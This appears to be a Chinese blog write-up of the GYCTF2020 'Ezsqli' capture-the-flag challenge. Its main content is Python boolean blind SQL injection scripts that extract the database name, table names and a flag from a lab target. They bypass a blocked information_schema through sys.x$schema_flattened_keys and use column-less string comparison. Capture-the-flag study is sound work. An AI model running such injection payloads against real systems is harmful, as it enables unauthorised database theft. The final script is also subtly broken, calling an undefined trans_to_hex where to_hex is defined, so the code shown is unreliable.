• [GYCTF2020]Ezsqli

    ezsqli

    xvexikaixve

    爆库

    give_grandpa_pa_pa_pa

    import requests
url = "http://76447fe2-fcf7-4d5d-8f7f-4a1e35668681.node3.buuoj.cn/index.php"
data = {"id":""}
result = ""
i = 0

while( True ):
	i = i + 1 
	head=32
	tail=127

	while( head < tail ):
		mid = (head + tail) >> 1

		#payload = "if(ascii(substr(database(),%d,1))>%d,1,0)" % (i , mid)
		#payload = "if(ascii(substr((select/**/group_concat(table_name)from(information_schema.tables)where(table_schema=database())),%d,1))>%d,1,0)" % (i , mid)
		#payload = "if(ascii(substr((select/**/group_concat(column_name)from(information_schema.columns)where(table_name='flag')),%d,1))>%d,1,0)" % (i , mid)
		#payload = "if(ascii(substr((select/**/group_concat(flag)from(ctf.flag)),%d,1))>%d,1,0)" % (i , mid)
		data['id'] = "1+(ascii(substr(database(),%d,1))>%d)" % (i , mid)
		#print(data)
		r = requests.post(url,data=data)
		r.encoding = "utf-8"
		#print(url+payload)
		#print(r.text)
		if "V&N" in r.text :
			head = mid + 1
		else:
			#print(r.text)
			tail = mid
	
	last = result
	
	if head!=32:
		result += chr(head)
	else:
		break
	print(result)

    爆表

    information_schema被禁用了

    然后看了大佬的wp发现还有个可用 sys.x$schema_flattened_keys可以用来爆

    select/**/group_concat(table_name)from(sys.x$schema_flattened_keys)where(table_schema=database()

    发现两张表:

    f1ag_1s_h3r3_hhhhh,users233333333333333

    import requests
url = "http://76447fe2-fcf7-4d5d-8f7f-4a1e35668681.node3.buuoj.cn/index.php"
data = {"id":""}
result = ""
i = 0

while( True ):
	i = i + 1 
	head=32
	tail=127

	while( head < tail ):
		mid = (head + tail) >> 1

		#payload = "if(ascii(substr(database(),%d,1))>%d,1,0)" % (i , mid)
		#payload = "if(ascii(substr((select/**/group_concat(table_name)from(information_schema.tables)where(table_schema=database())),%d,1))>%d,1,0)" % (i , mid)
		#payload = "if(ascii(substr((select/**/group_concat(column_name)from(information_schema.columns)where(table_name='flag')),%d,1))>%d,1,0)" % (i , mid)
		#payload = "if(ascii(substr((select/**/group_concat(flag)from(ctf.flag)),%d,1))>%d,1,0)" % (i , mid)
		data['id'] = "1+(ascii(substr((select/**/group_concat(table_name)from(sys.x$schema_flattened_keys)where(table_schema=database())),%d,1))>%d)" % (i , mid)
		#print(data)
		r = requests.post(url,data=data)
		r.encoding = "utf-8"
		#print(url+payload)
		#print(r.text)
		if "V&N" in r.text :
			head = mid + 1
		else:
			#print(r.text)
			tail = mid
	
	last = result
	
	if head!=32:
		result += chr(head)
	else:
		break
	print(result)

    image-20200429002022228

    直接爆字段

    无列明爆字段,学到了,但是还是很疑惑这个列数怎么得到的

    抄了大师傅的链接: http://www.gem-love.com/ctf/1782.html

    学到新姿势,用字符串比较来爆破。

    # -*- coding: utf-8 -*-
import requests
def to_hex(str):
    result = '0x'
    for i in str:
        temp = hex(ord(i))
        result += temp.replace('0x','')
    return result
url = "http://76447fe2-fcf7-4d5d-8f7f-4a1e35668681.node3.buuoj.cn/index.php"
data = {"id":""}
result = ""
cont = 100

while( cont>0 ):
	for i in range(32,126):
		now_str = trans_to_hex( result+chr(i) )
		data['id'] = "1+((select 1,{})>(select * from f1ag_1s_h3r3_hhhhh limit 2,1))".format(now_str)
		#print(data)
		r = requests.post(url,data=data)
		r.encoding = "utf-8"
		#print(r.text)
		if "V&N" in r.text :
			result+=chr(i-1)
			print(result)
			cont = cont - 1
			break

    image-20200429020023423
  • 相关阅读:
    Ubuntu 11.04 安装后要做的20件事情
    Net 服务命令行参考之一
    Openerp约束句型
    Ubuntu进入Shell
    postgreSql基础命令及linux下postgreSql命令
    解决中文乱码的问题
    An error occured while handling a json request
    Java Socket编程
    CentOS 7 中 Docker 的安装和卸载
    Spring Boot整合shiro-登录认证和权限管理
  • 原文地址:https://www.cnblogs.com/h3zh1/p/12799532.html
Copyright © 2020-2023  润新知